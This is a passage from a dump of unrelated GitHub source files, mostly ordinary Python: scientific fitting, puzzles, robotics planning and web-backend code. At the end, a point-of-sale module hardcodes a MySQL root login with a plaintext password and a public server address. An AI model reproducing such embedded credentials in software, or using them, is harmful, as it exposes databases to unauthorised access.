the\n# expression. In this example, we use `solve_ivp` to solve the ODE, and return the solution at the\n# specified time points.\n#\n# Because the `__init__` method takes an additional `domain` argument, the `to_numerical` method\n# must also be implemented correctly.\n\n\nclass IVPNumExpr(CompositeExpr):\n def __init__(\n self,\n t: Symbol | NumExpr | Expr,\n freq: Symbol | NumExpr | Expr,\n damping: Symbol | NumExpr | Expr,\n y0: Symbol | NumExpr | Expr,\n domain: tuple[float, float],\n ):\n expr = {\"t\": t, \"freq\": freq, \"damping\": damping, \"y0\": y0}\n self.domain = domain\n super().__init__(expr)\n\n def __call__(self, *args, **kwargs) -> np.ndarray:\n result = super().__call__(**kwargs)\n\n sol = solve_ivp(\n self.grad_func,\n self.domain,\n np.array([result[\"y0\"]]),\n t_eval=result[\"t\"],\n args=(result[\"freq\"], result[\"damping\"]),\n )\n\n return sol.y\n\n def to_numerical(self):\n num_expr = {k: to_numerical(expr) for k, expr in self.items()}\n instance = IVPNumExpr(**num_expr, domain=self.domain)\n\n return instance\n\n @staticmethod\n def grad_func(x, y, freq, damping):\n return np.sin(2 * np.pi * freq * x) * np.exp(-damping * x)\n\n\n# %%\n\n# %% [markdown]\n#\n# The resulting class can now be used in slimfit fitting, taking any symbol or expr as arguments for\n# the args `t, f, d, y0`, or it can be embedded in a larger model.\n\nt, f, d, y0, y = symbols(\"t f d y0 y\")\nivp = IVPNumExpr(t, f, d, y0, domain=(0.0, 25.0))\n\nmodel = Model({y: ivp})\n\n# Fix frequency at GT value to ensure fit converges\nguess = {\"f\": 0.2, \"d\": 0.5, \"y0\": -1.0}\nparameters = Parameters.from_symbols(ivp.symbols, guess).replace(\"f\", fixed=True)\n\nfit = Fit(model, parameters, data)\nresult = fit.execute()\n\nprint(result.parameters)\n\n# %%\n\nfig, ax = pplt.subplots()\nax.scatter(t_eval, ydata.flatten())\nax.plot(t_eval, ivp(t=t_eval, **parameters.guess).T, color=\"r\")\nax.plot(t_eval, ivp(t=t_eval, **result.parameters).T, 
color=\"k\")\npplt.show()\n","repo_name":"Jhsmit/slimfit","sub_path":"docs/examples/custom_numexpr_ivp.py","file_name":"custom_numexpr_ivp.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25798884442","text":"'''\n1\n5 3\n0 0 1 1 1\n1 1 1 1 0\n0 0 1 0 0\n0 1 1 1 1\n1 1 1 0 1\n'''\ndef puzzle_count(matrix, target_num) :\n total_sum_list = []\n for row in matrix:\n total_sum = 0\n for i in range(n):\n if row[i] == 1:\n total_sum += 1\n else:\n total_sum_list.append(total_sum)\n total_sum = 0\n\n total_sum_list.append(total_sum)\n return total_sum_list.count(target_num)\n\nt = int(input())\nfor case in range(1,t+1):\n n,k = map(int, input().split())\n matrix = [list(map(int, input().split())) for _ in range(n)]\n result = puzzle_count(matrix,k) + puzzle_count(list(zip(*matrix[::-1])),k)\n\n print(f'#{case}', result)","repo_name":"00purplecandy00/Algorithm-Test-03","sub_path":"2200072/어디에단어가들어갈수있을까.py","file_name":"어디에단어가들어갈수있을까.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"} +{"seq_id":"19725076852","text":"\"\"\"\n \t*************************** \n \t--------EveIDE_LIGHT-------- \n \t Author: Adancurusul\n \t Date: 2021-07-15 09:04:18\n \t LastEditors: Adancurusul\n \t LastEditTime: 2021-07-31 14:08:49\n \t Github: https://github.com/Adancurusul\n \t Email: adancurusul@gmail.com\n\n \t***************************\n \"\"\"\nimport re\n\nrgl_exp1 = r''' \n ((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double)) # 识别函数返回值类型\n (\\s*(\\*)?\\s*) # 识别返回值是否为指针类型以及中间是否包含空格\n (\\w+) # 识别函数名\n ((\\s*)(\\()(\\n)?) # 函数开始小括号\n ((\\s*)?(const)?(\\s*)? # 参数前是否有const\n ((void)|(char)|(short)|(int)|(float)|(long)|(double))? # 参数类型\n (\\s*)(\\*)?(\\s*)?(restrict)?(\\s*)?(\\w+)(\\s*)?(\\,)?(\\n)?(.*)?)?# 最后的*表示有多个参数\n ((\\s*)(\\))(\\n)?) # 函数结束小括号\n '''\n\nrgl_exp12 = r''' \n ((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double)) # 识别函数返回值类型\n (\\s*(\\*)?\\s*) # 识别返回值是否为指针类型以及中间是否包含空格\n (\\w+) # 识别函数名\n ((\\s*)(\\()(\\n)?) # 函数开始小括号\n (?P(.+)?)\n ((\\s*)(\\))(\\n)?) 
# 函数结束小括号\n ((\\s*)(\\{)(\\n)?)\n '''\ncompileStrA = r'((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double))(\\s*(\\*)?\\s*)(\\w+)((\\s*)(\\()(\\n)?)(.+)?((\\s*)(\\))(\\n)?)((\\s*)(\\{)(\\n)?)'\ncompileStrB = r\"((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double))(\\s*(\\*)?\\s*)(\\w+)((\\s*)(\\()(\\n)?)((\\s*)?(const)?(\\s*)?((void)|(char)|(short)|(int)|(float)|(long)|(double))?(\\s*)(\\*)?(\\s*)?(restrict)?(\\s*)?(\\w+)(\\s*)?(\\,)?(\\n)?(.*)?)?((\\s*)(\\))(\\n)?)\"\ndef get1stSymPos( s, fromPos=0):\n g_DictSymbols = {'\"': '\"', '/*': '*/', '//': '\\n'}\n listPos = [] # 位置,符号\n for b in g_DictSymbols: \n pos = s.find(b, fromPos)\n listPos.append((pos, b)) # 插入位置以及结束符号\n minIndex = -1 # 最小位置在listPos中的索引\n index = 0 # 索引\n while index < len(listPos):\n pos = listPos[index][0] # 位置\n if minIndex < 0 and pos >= 0: # 第一个非负位置\n minIndex = index\n if 0 <= pos < listPos[minIndex][0]: # 后面出现的更靠前的位置\n minIndex = index\n index = index + 1\n if minIndex == -1: # 没找到\n return (-1, None)\n else:\n return (listPos[minIndex])\n\ndef rmCommentsInCFile(s):\n g_DictSymbols = {'\"': '\"', '/*': '*/', '//': '\\n'}\n\n if not isinstance(s, str):\n raise TypeError(s)\n fromPos = 0\n while (fromPos < len(s)):\n result = get1stSymPos(s, fromPos)\n\n if result[0] == -1: # 没有符号了\n return s\n else:\n endPos = s.find(g_DictSymbols[result[1]], result[0] + len(result[1]))\n if result[1] == '//': # 单行注释\n if endPos == -1: # 没有换行符也可以\n endPos = len(s)\n s = s.replace(s[result[0]:endPos], ' ', 1)\n fromPos = result[0]\n elif result[1] == '/*': # 区块注释\n if endPos == -1: # 没有结束符就报错\n raise ValueError(\"块状注释未闭合\")\n s = s.replace(s[result[0]:endPos + 2], ' ', 1)\n fromPos = result[0]\n else: # 字符串\n if endPos == -1: # 没有结束符就报错\n raise ValueError(\"符号未闭合\")\n fromPos = endPos + len(g_DictSymbols[result[1]])\n return s\nif __name__ == \"__main__\":\n code = \"\"\"\nvoid FuncName(int param1,char param2, int *param3, double *parma4){\n printf(\"hello world!\\n\");\n}\n \"\"\"\n filePath =r\"C:\\Users\\User\\Documents\\GitHub\\EveIDE_Plus\\source\\t_workspace\\t_exCpro\\main.c\"\n with open(filePath,'r')as r:\n code0 = r.read()\n code0 = rmCommentsInCFile(code0)\n\n pat1 = re.compile(compileStrA, re.X)\n ret = pat1.findall(code0)\n if ret:\n for ea in ret:\n print(ea[11])\n #print(code)\n '''cl = code.split(\";\")\n\n for e in cl:\n print(e)\n ret = pat1.search(e)\n if None == ret:\n pass\n #print('不包含C函数定义!')\n else:\n #for eachIndex in range(len(ret.group())):\n print(\"定义\"+str(ret))\n #print(ret.group())'''\n\n","repo_name":"Adancurusul/EveIDE_LIGHT","sub_path":"source/t_file.py","file_name":"t_file.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"zh","doc_type":"code","stars":50,"dataset":"github-code","pt":"36"} +{"seq_id":"7227331574","text":"from collections import defaultdict, deque, namedtuple\nfrom pathlib import Path\nfrom statistics import median\nfrom typing import Iterator\n\nfrom utils import get_neighbors_n_dimensional, read_trimmed\n\n\nclass DictLike:\n def __getitem__(self, item):\n return getattr(self, item)\n\n def __setitem__(self, key, value):\n setattr(self, key, value)\n\n\nclass Point(DictLike):\n def __init__(self, x, y):\n self.x, self.y = x, y\n\n def __hash__(self):\n return hash((self.x, self.y))\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __repr__(self) -> str:\n return f\"({self.x}, {self.y})\"\n\n def fold(self, axis, line):\n if self[axis] > line:\n self[axis] = 2 * line - self[axis]\n return self\n\n\ndef 
q1(dots, folds):\n axis, line = folds[0]\n for dot in dots.copy():\n if axis == \"x\":\n if dot.x > line:\n dots.remove(dot)\n dots.add(Point(2 * line - dot.x, dot.y))\n return len(dots)\n\n\ndef print_dots(dots):\n x_max = max(dot.x for dot in dots)\n y_max = max(dot.y for dot in dots)\n grid = [[\" \" for _ in range(x_max + 1)] for _ in range(y_max + 1)]\n for dot in dots:\n grid[dot.y][dot.x] = \"*\"\n for row in grid:\n print(\"\".join(row))\n\n\ndef q2(dots, folds):\n for axis, line in folds:\n # If edited in place, duplicates aren't removed *shrug*\n dots = {d.fold(axis, line) for d in dots}\n print_dots(dots)\n return len(dots)\n\n\ndef parse_dots(values):\n for v in values:\n dot = v.split(\",\")\n if len(dot) == 2:\n yield Point(int(dot[0]), int(dot[1]))\n\n\ndef parse_folds(values):\n for v in values:\n if len(v.split(\" \")) == 3:\n fold = v.split(\" \")[2]\n yield fold.split(\"=\")[0], int(fold.split(\"=\")[1])\n\n\ndef main():\n filename = \"./13.txt\"\n values = read_trimmed(filename)\n dots = set(parse_dots(values))\n folds = [*parse_folds(values)]\n print(q1(dots, folds))\n\n values = read_trimmed(filename)\n dots = set(parse_dots(values))\n folds = [*parse_folds(values)]\n print(q2(dots, folds))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"blomejd/advent_of_code_2021","sub_path":"advent_2021/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"2884716529","text":"# coding:utf-8\n# @Time : 2019-09-11 11:02\n# @Author: Xiawang\n# Description:\nfrom flask_restful import Resource, reqparse\n\nfrom backend.common.extensions import convert_json\nfrom backend.common.new_models import User, TestSheet\nfrom backend.common.response_structure import ResponseStructure\nfrom backend.common.state import Results, ResponseCode\n\n\nclass MyTestSheets(Resource):\n\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('TOKEN', type=str, location='headers')\n args = parser.parse_args()\n user = User.verify_auth_token(args['TOKEN'])\n if not user:\n return Results().get(ResponseCode.FAIL_LOGIN_AUTH)\n results = TestSheet.get_or_none(TestSheet.qa_id == user.id, TestSheet.status=='待部署')\n if results is None:\n return Results().get(ResponseCode.SUCCESS)\n result_data = Results().set_data()\n results = TestSheet.select().where(TestSheet.qa_id == user.id, TestSheet.status == '待部署').order_by(\n TestSheet.create_time.desc())\n\n for result in results:\n testsheet_data = convert_json(TestSheet, result.id)\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['qa_id'],\n user='qa_name')\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['backend_id'],\n user='backend_name')\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['front_id'], user='front_name')\n result_data.append(testsheet_data)\n\n return Results().get(ResponseCode.SUCCESS, data=result_data)\n","repo_name":"Ariaxie-1985/aria","sub_path":"backend/resources/spring/my_testsheets.py","file_name":"my_testsheets.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34073036518","text":"__author__ = 'Hamilton Kibbe '\n__version__ = '1.0'\n\n\n\n\nMETADATA = {\n 'name': 'pyableton',\n 'version': __version__,\n 'url': 'https://github.com/hamiltonkibbe/PyAbleton',\n 'packages': ['pyableton'],\n 'package_data': {'presets': 
['presets/res/*']},\n 'author': 'Hamilton Kibbe',\n 'author_email': 'ham@hamiltonkib.be',\n 'description': 'A library for creating/editing Ableton Live presets',\n 'license': 'MIT License'\n}\n\nSETUPTOOLS_METADATA = {\n 'install_requires':['setuptools','bs4'],\n 'include_package_data': True\n}\n\ndef install():\n \"\"\" Install using setuptools, fallback to distutils\n \"\"\"\n try:\n from setuptools import setup\n METADATA.update(SETUPTOOLS_METADATA)\n setup(**METADATA)\n except ImportError:\n from sys import stderr\n stderr.write('Could not import setuptools, using distutils')\n stderr.write('NOTE: You will need to install dependencies manualy')\n from distutils.core import setup\n setup(**METADATA)\n\nif __name__ == '__main__':\n install()\n\n","repo_name":"hamiltonkibbe/PyAbleton","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"36"} +{"seq_id":"18962034242","text":"import os\nimport math\nimport string\n\ninput_file = open(\"input.txt\", \"r\")\n\ncounter = 0\n\nfor line in input_file:\n g1, g2 = line.strip().split(\",\")\n g1a, g1b = g1.split(\"-\")\n g2a, g2b = g2.split(\"-\")\n s1 = set(range(int(g1a), int(g1b) + 1))\n s2 = set(range(int(g2a), int(g2b) + 1))\n\n if(s1.issubset(s2) or s2.issubset(s1)):\n counter += 1\n\n\nprint(counter)","repo_name":"rgvillanueva28/advent-of-code-2022","sub_path":"Day 4 - Camp Cleanup/Part 1.py","file_name":"Part 1.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"16679927011","text":"from src.modal.Stl import Stl\nfrom src.modal.Hsteel import Hsteel\nfrom src.algorithm.HsteelAnalysis import HsteelAnalysis\n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport argparse\nimport csv\nimport os\nimport copy\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom stl import mesh\nimport stl, numpy\nimport time\n\ndef getAllPosAssociation(allPosAttr):\n posAttr = []\n\n for item in allPosAttr:\n for cThick in item[3]:\n for tbThick in item[4]:\n value = [item[0], item[1], item[2], cThick, tbThick]\n posAttr.append(value)\n\n return posAttr\n\ndef main(args):\n stlName = args.name\n stlPath = 'stl/' + stlName\n\n paintOrder = [\n [0, 1, 2],\n [3, 4, 5],\n [6],\n [7],\n ]\n\n # Stl Obj\n stlObj = Stl()\n posHsteelAttr = stlObj.getAllPossibleHsteelAttr(stlPath)\n posHsteelAttr = getAllPosAssociation(posHsteelAttr)\n\n # Hsteel Attr Analysis\n hsteelAnalysis = HsteelAnalysis()\n hsteelConfig = hsteelAnalysis.getMostSimilarConfig(posHsteelAttr)\n for p in hsteelConfig[:5]:\n print(p)\n\n # Hsteel Painting\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n hsteelPaint = Hsteel(ax)\n if len(hsteelConfig) > 0:\n print('Similar Result....')\n print(hsteelConfig[0]['config'])\n \n maxLength = 2000\n\n length = hsteelConfig[0]['config']['length']\n paintPoints = []\n # if length < maxLength: maxLength = length\n paintPoint = hsteelPaint.startPaint3dModal(hsteelConfig[0]['config'], length, paintOrder[args.paintMode], args.paintLength)\n lengthTimes = int(length / maxLength)\n for time in range(0, lengthTimes):\n for p in copy.deepcopy(paintPoint):\n if p[1] != -1: p[1] += maxLength * time\n paintPoints.append(p)\n if length % maxLength != 0:\n paintPoint = hsteelPaint.startPaint3dModal(hsteelConfig[0]['config'], length % maxLength, 
paintOrder[args.paintMode], args.paintLength)\n for p in copy.deepcopy(paintPoint):\n if p[1] != -1: p[1] += length - (length % maxLength)\n paintPoints.append(p)\n\n writeRouteToFile(paintPoints)\n plt.show()\n\ndef checkAllStlConfig():\n stlfiles = [f for f in listdir('stl') if isfile(join('stl', f))]\n \n # Init\n stlObj = Stl()\n hsteelAnalysis = HsteelAnalysis()\n for stlName in stlfiles:\n startTime = time.time()\n print('File ', stlName, ' is checking.....')\n stlPath = 'stl/' + stlName\n\n posHsteelAttr = stlObj.getAllPossibleHsteelAttr(stlPath)\n posHsteelAttr = getAllPosAssociation(posHsteelAttr)\n\n hsteelConfig = hsteelAnalysis.getMostSimilarConfig(posHsteelAttr)\n\n if len(hsteelConfig) > 0:\n similarConfig = hsteelConfig[0]\n record = [\n stlName,\n similarConfig['sameNum'],\n similarConfig['distance'],\n similarConfig['config']['length'],\n similarConfig['config']['height'],\n similarConfig['config']['width'],\n similarConfig['config']['cThick'],\n similarConfig['config']['tbThick'],\n (time.time() - startTime)\n ]\n else:\n record = [stlName, -1, -1, -1, -1, -1, -1, -1, -1]\n writeRecordToFile(record)\n\n print('Finished...')\n\ndef writeRecordToFile(args):\n with open('./src/output/stl_record.csv', 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n\n data = [d for d in args]\n writer.writerow(data)\n\ndef writeRouteToFile(route):\n with open('./src/output/route.csv', 'a', newline='') as csvfile:\n csvfile.truncate(0)\n writer = csv.writer(csvfile)\n for i in route:\n if i[1] == -1: continue\n writer.writerow(i)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--name', '-n', default='H-900x300x14x28x2600.stl', type=str)\n parser.add_argument('--paintMode', '-m', default=4, type=int)\n parser.add_argument('--paintLength', '-l', default=125, type=int)\n parser.add_argument('--runall', '-r', default=False, type=bool)\n\n args = parser.parse_args()\n \n if args.runall: checkAllStlConfig()\n else: main(args)","repo_name":"discreet0303/h-steel-route-plan","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"6260376001","text":"import pytest\nimport logging\nfrom .settings import CLIENT_CONF, DB_CONF\nfrom arango import ArangoClient\n\n\n#\n# Logging\n#\nLOG_LEVELS = {\n 'graphene-arango': logging.DEBUG,\n 'requests': logging.WARN,\n 'urllib3': logging.WARN,\n}\nlogging.basicConfig(level=LOG_LEVELS['graphene-arango'])\nfor litem in LOG_LEVELS.keys():\n logging.getLogger(litem).setLevel(LOG_LEVELS[litem])\n\n\ndef _test_db():\n cli = ArangoClient(**CLIENT_CONF)\n return cli.db(**DB_CONF)\n\n\n@pytest.fixture(scope=\"session\")\ndef test_db():\n # cli = ArangoClient(**CLIENT_CONF)\n yield _test_db()\n\n\n@pytest.fixture(scope=\"session\")\ndef cleanup(test_db):\n yield\n assert test_db.delete_collection('people')\n","repo_name":"riverfr0zen/graphene-arango","sub_path":"graphene_arango/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"71197249383","text":"#!/usr/bin/env python\n\nimport rospy\nimport sys\nfrom move_base_msgs.msg import *\nfrom geometry_msgs.msg import PoseStamped\n\n\ndef has_reached_goal(data):\n goal_status = data.status.text\n rospy.loginfo(goal_status)\n if goal_status == \"Goal reached.\":\n return True\n else:\n return 
False\n\n\ndef respond_move_base_result(x, y):\n msg_result = rospy.wait_for_message(\"/robot_0/move_base/result\", MoveBaseActionResult)\n if has_reached_goal(msg_result):\n rospy.loginfo(\"Point x: %f y: %f reached successfully\", x, y)\n sys.exit(0) # success\n else:\n rospy.loginfo(\"Did not reach point x: %f y: %f\", x, y)\n sys.exit(1) # fail\n\n\ndef respond_goal_success(data, expected_x, expected_y):\n x = float(data.pose.position.x)\n y = float(data.pose.position.y)\n rospy.loginfo('Checking goal status X: %f Y: %f', x, y)\n\n if expected_x - 0.1 <= x <= expected_x + 0.1 and expected_y - 0.1 <= y <= expected_y + 0.1:\n respond_move_base_result(x, y)\n else:\n rospy.loginfo(\"Waiting for a next goal\")\n\n\ndef oracle():\n rospy.init_node('oracle', anonymous=True)\n rospy.loginfo(\"Starting oracle ...\")\n rate = rospy.Rate(2)\n\n x, y = list(map(float, sys.argv[1:3]))\n\n while not rospy.is_shutdown():\n rospy.loginfo(\"Waiting for goal ...\")\n pose = rospy.wait_for_message(\"/robot_0/move_base_node/current_goal\", PoseStamped)\n respond_goal_success(pose, x, y)\n rate.sleep()\n\n\nif __name__ == '__main__':\n oracle()\n","repo_name":"ingmarliibert/testit-patrol-learn","sub_path":"testit_patrol_learn/testit_tests/tests/01/oracle/oracle.py","file_name":"oracle.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"32808873641","text":"# !/usr/bin/env python\nfrom __future__ import print_function, division\n\nfrom time import time, sleep\nimport signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport rospy\nimport pyexotica as exo\nfrom pyexotica.publish_trajectory import *\n\nimport hsrb_exotica_python_script\n\ndef start_aico():\n do_plot = True\n traj_version = -1\n\n use_screenshot = False\n # ffmpeg -r 50 -f image2 -s 1920x1080 -i ./hsr_driveby_visualisation_%03d.png -vcodec libx264 -pix_fmt yuv420p ./output.mp4\n screenshot = lambda *args: None\n if use_screenshot:\n from jsk_rviz_plugins.srv import Screenshot, ScreenshotRequest, ScreenshotResponse\n rospy.wait_for_service('/rviz/screenshot')\n screenshot = rospy.ServiceProxy('/rviz/screenshot', Screenshot)\n\n exo.Setup.init_ros()\n # config_name = '{hsr_driveby_full}/resources/hsr_meeting_room_table_aico_new.xml'\n config_name = '{hsr_driveby_full}/resources/hsr_meeting_room_table_aico.xml'\n solver = exo.Setup.load_solver(config_name)\n problem = solver.get_problem()\n scene = problem.get_scene()\n kt = scene.get_kinematic_tree()\n joint_limits = problem.get_scene().get_kinematic_tree().get_joint_limits()\n\n # Set target for soda can\n scene.attach_object(\"SodaCan\", \"TargetObject\")\n #scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06+0.04]))\n #added offset to the y coordinate since planning and simulation grasp objects have different geometry.\n # bottle on right hand side\n # \n scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06]))#+0.04]))\n # bottle on left hand side\n scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06]))#+0.04]))\n\n # Move robot to start state\n x_start = problem.start_state\n x_start[0] = 0\n x_start[1] = 0\n x_start[2]= 0\n # x_start[2] = -np.pi/2.\n problem.start_state = x_start\n scene.set_model_state(problem.start_state)\n #scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 
'hand_r_distal_joint': -0.6, 'wrist_roll_joint': -1.})\n #set to move to go, assuming robot is already moving\n # \n # scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': 0, 'wrist_flex_joint': -np.pi/2, 'arm_roll_joint': -np.pi/2})\n scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': 0, 'wrist_flex_joint': -np.pi/2, 'arm_roll_joint': 0})\n problem.start_state = scene.get_model_state()\n q_start = problem.apply_start_state(True)\n q_start = np.clip(q_start, joint_limits[:,0], joint_limits[:,1])\n problem.update(q_start, 0)\n problem.start_state = scene.get_model_state()\n q_start = problem.apply_start_state(True)\n if np.any(q_start < joint_limits[:,0]) or np.any(q_start > joint_limits[:,1]):\n raise RuntimeError(\"Start state exceeds joint limits!\")\n\n mug_location = scene.fk('SodaCan', exo.KDLFrame(), '', exo.KDLFrame()).get_translation_and_rpy()\n\n # t_grasp_begin = 3.5 #4.2\n t_grasp_begin = 4.5\n t_grasp_duration = 0.5\n T_grasp_begin = int(t_grasp_begin / problem.tau)\n T_grasp_end = int((t_grasp_begin + t_grasp_duration) / problem.tau)\n\n # The target position needs to be reached during the grasping period\n problem.set_rho('Position', 0, 0)\n for t in range(T_grasp_begin, T_grasp_end):\n problem.set_rho('Position', 1e4, t)\n problem.set_goal('Position', mug_location[:3], t)\n\n # The HSR has a poor reachability, so we deactivate the base tracking here\n # problem.set_rho('BasePosition', 0, t)\n\n # Height above the table before and after grasp\n problem.set_rho('LiftOffTable', 1e2, T_grasp_begin - 20)\n # problem.set_rho('LiftOffTable', 1e3, T_grasp_end + 5)\n # problem.set_rho('LiftOffTable', 1e4, T_grasp_end + 10)\n problem.set_rho('LiftOffTable', 1e2, T_grasp_end + 20)\n\n\n # The axis needs to be fixed from the beginning of the grasp to the end of the motion\n for t in range(T_grasp_begin, problem.T):\n #problem.set_rho('AxisAlignment', 1e4, t)\n problem.set_rho('AxisAlignment', 1e2, t)\n\n problem.set_rho('BaseOrientation', 1e2, -1)\n\n # Initial trajectory = zero motion\n zero_motion = np.zeros((problem.T,problem.N))\n for t in range(problem.T):\n zero_motion[t,:] = q_start\n problem.initial_trajectory = zero_motion\n\n solution = solver.solve()\n print(\"Solved in\", solver.get_planning_time(), \"final cost\", problem.get_cost_evolution()[1][-1])\n # '''\n # Show convergence plot\n fig = plt.figure(1)\n plt.plot(problem.get_cost_evolution()[0], problem.get_cost_evolution()[1])\n plt.yscale('log')\n plt.ylabel('Cost')\n plt.xlabel('Time (s)')\n plt.xlim(0,np.max(problem.get_cost_evolution()[0]))\n plt.title('Convergence')\n\n # Show cost breakdown\n fig = plt.figure(2)\n # '''\n if do_plot:\n costs = {}\n ct = 1.0 / problem.tau / problem.T\n for t in range(problem.T):\n problem.update(solution[t,:],t)\n for cost_task in problem.cost.indexing:\n task = problem.cost.tasks[cost_task.id]\n task_name = task.name\n task_id = task.id\n costs[task_name] = np.zeros((problem.T,))\n # print(task_id, task_name, task, cost_task.start, cost_task.length, cost_task.startJ, cost_task.lengthJ)\n for t in range(problem.T):\n ydiff = problem.cost.ydiff[t][cost_task.startJ:cost_task.startJ+cost_task.lengthJ]\n rho = 
problem.cost.S[t][cost_task.startJ:cost_task.startJ+cost_task.lengthJ,cost_task.startJ:cost_task.startJ+cost_task.lengthJ]\n cost = np.dot(np.dot(ydiff, rho), ydiff)\n costs[task_name][t] = ct * cost\n # '''\n if do_plot:\n costs['Task'] = np.zeros((problem.T,))\n costs['Transition'] = np.zeros((problem.T,))\n for t in range(problem.T):\n costs['Task'][t] = problem.get_scalar_task_cost(t)\n costs['Transition'][t] = problem.get_scalar_transition_cost(t)\n for cost in costs:\n plt.plot(costs[cost], label=cost)\n plt.legend()\n plt.xlim(0,problem.T)\n plt.title('Cost breakdown across trajectory per task')\n plt.show()\n plot(solution, labels=scene.get_controlled_joint_names())\n print(mug_location)\n return solution\n publish_trajectory(solution, problem.T*problem.tau, problem)\n# '''\n#midpoint = int(problem.T / 2)\n# midpoint = int((t_grasp_begin + t_grasp_duration)/problem.tau)\n# Add a custom publish_trajectory to support attaching the Coke can...\ndef publish_trajectory(traj, T, problem, once=False):\n if len(traj) == 0:\n print(\"Trajectory has zero elements\")\n raise\n signal.signal(signal.SIGINT, sig_int_handler)\n print('Playing back trajectory ' + str(T) + 's')\n dt = float(T) / float(len(traj))\n t = 0\n grasp_times = [t_grasp_begin, t_grasp_duration]\n return(solution)\n # print(\"saving trajectory\")\n # np.save('example_trajectory_t'+str(traj_version),solution)\n # hsrb_exotica_python_script.send_trajectory(solution, grasp_times, dt)\n # while True:\n # try:\n # publish_pose(traj[t], problem, float(t) * dt)\n # sleep(dt)\n\n # # Create screenshot if desired\n # if use_screenshot:\n # screenshot('/tmp/hsr_driveby_visualisation_{:03d}.png'.format(t))\n # sleep(0.1)\n # if t == len(traj) - 1:\n # print(\"Screenshots created, exiting.\")\n # break\n\n # if t >= len(traj) - 1 and once:\n # return\n # t = (t + 1) % len(traj)\n # if t == midpoint:\n # scene.attach_object(\"SodaCan\", \"hand_palm_link\")\n # elif t == 0:\n # scene.attach_object_local(\"SodaCan\", \"\", mug_location)\n # except KeyboardInterrupt:\n # return False\n#print(np.r_[mug_location[:3],3,4,5])\n#print(problem)\n#print(type(problem))\n#print(problem.start_state)\n","repo_name":"rshi159/hsr_driveby_full","sub_path":"scripts/rob_stuff/hsr_meeting_table_aico_whole.py","file_name":"hsr_meeting_table_aico_whole.py","file_ext":"py","file_size_in_byte":8435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"13240955694","text":"# pos project\n# Invoice maker\n\nimport pymysql\nimport time, datetime\n\nconn = pymysql.connect(host='45.119.147.76', user='root', password='201400867', db='hufPOS', charset='utf8')\ncurs = conn.cursor()\n\nclass Payinfo:\n def getdata(self):\n curs.execute(\"\"\"SELECT * FROM t_payinfo \"\"\")\n conn.commit()\n all_table = curs.fetchall()\n return all_table\n\n def search_obj(self, Pnumb):\n try:\n curs.execute(\"\"\"SELECT * FROM t_payinfo WHERE Pnumb = %s\"\"\", Pnumb)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\n def get_pmenu(self, Pnumb):\n try:\n curs.execute(\"\"\"SELECT Pmenu FROM t_payinfo WHERE Pnumb = %s\"\"\", Pnumb)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\n def get_mns(self, MNcode):\n try:\n curs.execute(\"\"\"SELECT MNname, MNprice FROM t_product WHERE MNcode = %s\"\"\", MNcode)\n conn.commit()\n src_result = 
